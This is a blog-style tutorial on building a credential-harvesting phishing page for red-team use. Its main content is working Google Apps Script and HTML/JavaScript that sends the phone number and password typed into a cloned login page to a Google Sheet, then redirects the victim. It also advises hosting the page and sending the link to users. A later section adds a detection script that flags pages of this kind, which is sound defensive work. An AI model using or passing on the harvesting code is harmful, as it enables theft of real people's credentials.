Phishing using Google Sheets for Red Team Engagements
2024-1-17 22:53:58 Author: infosecwriteups.com

1. Navigate to Google Sheets and create a sheet
2. Navigate to Extensions > Apps Script
3. Add the script below to Code.gs

// Google Apps Script code
var SPREADSHEET_ID = 'YOUR_SPREADSHEET_ID';

function doPost(e) {
  var phone = e.parameter.phone;
  var password = e.parameter.password;

  // Open the spreadsheet using its ID
  var sheet = SpreadsheetApp.openById(SPREADSHEET_ID).getActiveSheet();

  // Append the data to the sheet
  sheet.appendRow([phone, password]);

  // Redirect to google.com
  return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);
}

Now replace 'YOUR_SPREADSHEET_ID' with your spreadsheet ID, which can be found in the URL of the Google Sheet you created.

Change the input fields below to match your web application:

// Append the data to the sheet
sheet.appendRow([phone, password]);

Change the URL below to the one the user should be redirected to once the credentials are given:

// Redirect to google.com
return ContentService.createTextOutput('<script>window.location.href="https://www.google.com";</script>').setMimeType(ContentService.MimeType.HTML);

Once the changes are complete, deploy the Apps Script using the Deploy option.

Select the Web App option.

Then authorize the web app with your Google account.

Now copy the shareable script URL, go to the cloned web app, and place this URL inside the <head> </head> tag:

<!DOCTYPE html><html><head >
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>TEST</title>
<script src="https://script.google.com/macros/s/tttttttttttt/exec"></script>
</head>

Finally, place the code below after the login input form, referencing your input fields:

<script>
function submitForm() {
  var phone = document.getElementById("phone").value;
  var password = document.getElementById("password").value;

  // Call the Google Apps Script function with the form data
  google.script.run.doPost({ phone: phone, password: password });
}
</script>

Now host your web app on a VPS or in your preferred environment and test the login page. Once tested, you will see that the credentials are captured in the Google Sheet.

This way you do not need PHP or any other server-side functions; you can host the page with a simple Python server on your VPS and share the phishing URL with the users.
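
Seen from the detection side, a page built this way pairs a password field with a reference to an Apps Script web-app URL (script.google.com/macros/s/.../exec) or a google.script.run call. The check below is an added example, not code from the original post; the function name inspectPage and all sample HTML are constructed for illustration.

```javascript
// Added example (not from the original post): flag HTML that pairs a password
// field with a Google Apps Script web-app endpoint, the combination built above.
// inspectPage and the sample documents are constructed for illustration.

// Apps Script web-app deployments are served from /macros/s/<deployment id>/exec (or /dev).
const WEBAPP_URL = /https:\/\/script\.google\.com\/macros\/s\/([A-Za-z0-9_-]+)\/(?:exec|dev)/g;
const PASSWORD_INPUT = /<input\b[^>]*\btype\s*=\s*["']?password\b/i;
const PASSWORD_ID = /getElementById\(\s*["']password["']\s*\)/i;
const SCRIPT_RUN = /\bgoogle\.script\.run\b/;

function inspectPage(html) {
  // De-duplicate endpoints so a URL repeated in the page is reported once.
  const endpoints = [...new Set([...html.matchAll(WEBAPP_URL)].map((m) => m[0]))];
  const collectsPassword = PASSWORD_INPUT.test(html) || PASSWORD_ID.test(html);
  const usesScriptRun = SCRIPT_RUN.test(html);
  const reasons = [];
  if (endpoints.length) reasons.push("references Apps Script web app");
  if (collectsPassword) reasons.push("collects a password");
  if (usesScriptRun) reasons.push("calls google.script.run");
  // Alert only on the combination: either signal alone is common on benign pages.
  const suspicious = collectsPassword && (endpoints.length > 0 || usesScriptRun);
  return { suspicious, endpoints, reasons };
}

// Constructed sample: the <head> and submit handler shown in this write-up.
const SAMPLE_PHISH = `<!DOCTYPE html><html><head>
<script src="https://script.google.com/macros/s/tttttttttttt/exec"></script>
</head><body>
<input id="phone"><input id="password" type="password">
<script>
function submitForm() {
  var password = document.getElementById("password").value;
  google.script.run.doPost({ phone: "", password: password });
}
</script></body></html>`;

// Constructed benign samples: an ordinary login form, and a page that only links to a web app.
const SAMPLE_LOGIN = `<form action="/login" method="post"><input type="password" name="p"></form>`;
const SAMPLE_LINK = `<a href="https://script.google.com/macros/s/EXAMPLE_DEPLOYMENT_ID/exec">Survey</a>`;

for (const [name, html] of [["phish", SAMPLE_PHISH], ["login", SAMPLE_LOGIN], ["link", SAMPLE_LINK]]) {
  console.log(name, JSON.stringify(inspectPage(html)));
}
```

The same patterns can be applied to crawled pages, reported URLs, or mail-gateway HTML attachments; the extracted deployment URL is the value to include in an abuse report.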


Article source: https://infosecwriteups.com/phishing-using-google-sheets-for-red-team-engagements-ac79298ddb90?source=rss----7b722bfd1b8d--bug_bounty